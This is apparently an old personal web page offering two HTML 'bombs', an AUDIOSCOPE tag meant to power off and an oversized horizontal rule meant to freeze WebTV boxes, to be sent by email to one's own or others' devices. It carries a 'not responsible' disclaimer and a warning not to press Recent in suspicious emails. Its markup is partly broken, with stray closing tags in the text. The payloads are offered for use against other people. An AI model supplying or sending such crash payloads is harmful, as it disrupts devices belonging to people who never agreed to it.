
Here are some Bombs that will do weird things to your or others Webtv Boxes.

Note:I am not responsible for what you do with these Items on this page. It is only INFORMATION.
Use at your own risk!

Here is the Code for the Power Off Bomb. Use it in email.
<AUDIOSCOPE GAIN=1 RIGHTCOLOR=WHITE LEFTOFFSET=2 LEFTCOLOR=TURQUOISE HEIGHT=10 WIDTH=7 BORDER=10 MAXLEVEL="TRUE" BGCOLOR="BLACK"> </plaintext> <br> <hr> Here is the code for the freeze bomb: <br> <plaintext> <hr size=50000> </plaintext> </center> </i> <br> <hr> They are the only Webtv Poweroffs or Freezes I am putting here.(They are the best). I know there are some that can crash your box(for good) but I don't know them.(Even if I did I wouldn't tell you.:). <hr> <b><big>Note:</big>If somone send you an Email and it says press Recent <big><b>DO NOT PRESS RECENT!</big></b> <!--EndFreetext--> <p> <!--Counter--> <center><img src="/cgi-bin/Count.cgi"></center> <p> <!--EndCounter--> <!--Email--> <center>Email: <a href=""></a></center> <!--EndEmail--> </body> </html>